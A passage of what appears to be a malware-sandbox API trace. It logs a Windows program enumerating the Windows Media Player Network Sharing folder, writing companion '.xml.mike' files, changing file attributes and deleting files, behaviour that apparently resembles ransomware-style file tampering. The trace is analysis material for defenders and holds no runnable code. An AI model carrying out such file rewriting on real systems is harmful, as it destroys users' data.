ftCreationTime.dwLowDateTime=0x898f4b97, ftCreationTime.dwHighDateTime=0x1c9ea0d, ftLastAccessTime.dwLowDateTime=0x898f4b97, ftLastAccessTime.dwHighDateTime=0x1c9ea0d, ftLastWriteTime.dwLowDateTime=0x898f4b97, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0x10a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="DMR_48.png", cAlternateFileName="")) returned 1 [0100.957] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8291abe2, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x8291abe2, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x8b2192a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0x18db, dwReserved0=0x0, dwReserved1=0x0, cFileName="RenderingControl.xml", cAlternateFileName="")) returned 1 [0100.957] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8291abe2, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x8291abe2, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x8b2192a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0x18db, dwReserved0=0x0, dwReserved1=0x0, cFileName="RenderingControl.xml", cAlternateFileName="")) returned 0 [0100.957] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0100.957] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0100.957] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0100.957] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.957] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.957] CoTaskMemFree (pv=0x506980) [0100.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.958] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing", lpFilePart=0x0) returned 0x35 [0100.958] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0100.958] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8044b2b8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8044b2b8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0100.959] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8044b2b8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8044b2b8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.960] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf365935, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf365935, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2c7e17, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x152e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ConnectionManager.xml", cAlternateFileName="")) returned 1 [0100.960] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf365935, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf365935, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2c7e17, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2092, dwReserved0=0x0, dwReserved1=0x0, cFileName="ContentDirectory.xml", cAlternateFileName="")) returned 1 [0100.960] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf38ba92, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf38ba92, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MediaReceiverRegistrar.xml", cAlternateFileName="")) returned 1 [0100.960] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf38ba92, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf38ba92, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5352, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_bw120.jpg", cAlternateFileName="")) returned 1 [0100.960] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf38ba92, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf38ba92, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1922, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_bw120.png", cAlternateFileName="")) returned 1 [0100.961] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3b1bef, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf3b1bef, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc38, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_bw32.bmp", cAlternateFileName="")) returned 1 [0100.961] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3b1bef, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf3b1bef, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x231f, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_bw32.jpg", cAlternateFileName="")) returned 1 [0100.961] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3d7d4c, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf3d7d4c, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x980, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_bw48.bmp", cAlternateFileName="")) returned 1 [0100.961] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3fdea9, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf3fdea9, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2aa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_bw48.jpg", cAlternateFileName="")) returned 1 [0100.961] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3fdea9, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf3fdea9, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x101c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_bw48.png", cAlternateFileName="")) returned 1 [0100.961] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3fdea9, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf3fdea9, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c3140d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5788, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_color120.jpg", cAlternateFileName="")) returned 1 [0100.961] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf424006, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf424006, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c3140d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2f4b, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_color120.png", cAlternateFileName="")) returned 1 [0100.962] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf424006, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf424006, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c3140d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc38, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_color32.bmp", cAlternateFileName="")) returned 1 [0100.962] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf44a163, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf44a163, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c3140d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x24cd, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_color32.jpg", cAlternateFileName="")) returned 1 [0100.962] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf44a163, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf44a163, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c3140d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1b38, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_color48.bmp", cAlternateFileName="")) returned 1 [0100.962] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf44a163, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf44a163, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c3140d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2c85, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_color48.jpg", cAlternateFileName="")) returned 1 [0100.962] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf4702c0, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf4702c0, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c3140d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1532, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_color48.png", cAlternateFileName="")) returned 1 [0100.962] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0100.963] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0100.963] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0100.963] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0100.964] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0100.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adfa0) returned 1 [0100.968] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af09c) returned 1 [0100.970] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0100.970] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0100.970] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0100.970] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0100.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0100.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0100.971] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml.mike", lpFilePart=0x0) returned 0x50 [0100.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0100.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0100.971] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml", lpFilePart=0x0) returned 0x4b [0100.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0100.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0100.972] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0100.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0100.972] WriteFile (in: hFile=0x288, lpBuffer=0x22994e0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x22994e0*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0100.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0100.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0100.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0100.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0100.974] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0100.976] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml.mike", lpFilePart=0x0) returned 0x50 [0100.976] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0100.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0100.977] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0100.977] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0100.978] WriteFile (in: hFile=0x288, lpBuffer=0x22a7630*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x22a7630*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0100.978] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml.mike", lpFilePart=0x0) returned 0x50 [0100.978] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0100.978] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0100.979] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml.mike", lpFilePart=0x0) returned 0x50 [0100.979] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0100.979] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml", dwFileAttributes=0x80) returned 0 [0100.980] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml", lpFilePart=0x0) returned 0x4b [0100.980] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml.mike", lpFilePart=0x0) returned 0x50 [0100.980] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b8) returned 1 [0100.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0b4) returned 1 [0100.981] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml.mike", lpFilePart=0x0) returned 0x50 [0100.981] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml.mike" (normalized: "c:\\program files\\windows media player\\network sharing\\connectionmanager.xml.mike")) returned 1 [0100.982] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0100.983] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adfa0) returned 1 [0100.984] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af09c) returned 1 [0100.984] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0100.984] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml", lpFilePart=0x0) returned 0x4a [0100.984] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0100.984] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0100.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0100.985] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0100.985] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0100.985] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml.mike", lpFilePart=0x0) returned 0x4f [0100.985] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0100.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0100.985] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml", lpFilePart=0x0) returned 0x4a [0100.986] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0100.986] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0100.986] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0100.986] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0100.986] WriteFile (in: hFile=0x288, lpBuffer=0x22ac174*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x22ac174*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0100.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0100.987] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0100.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0100.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0100.988] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0100.990] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml.mike", lpFilePart=0x0) returned 0x4f [0100.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0100.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0100.991] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0100.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0100.992] WriteFile (in: hFile=0x288, lpBuffer=0x22be754*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x22be754*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0100.992] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml.mike", lpFilePart=0x0) returned 0x4f [0100.992] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0100.992] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0100.993] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml.mike", lpFilePart=0x0) returned 0x4f [0100.993] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.993] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml", dwFileAttributes=0x80) returned 0 [0100.994] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml", lpFilePart=0x0) returned 0x4a [0100.994] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml.mike", lpFilePart=0x0) returned 0x4f [0100.994] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml.mike", lpFilePart=0x0) returned 0x4f [0100.994] DeleteFileW 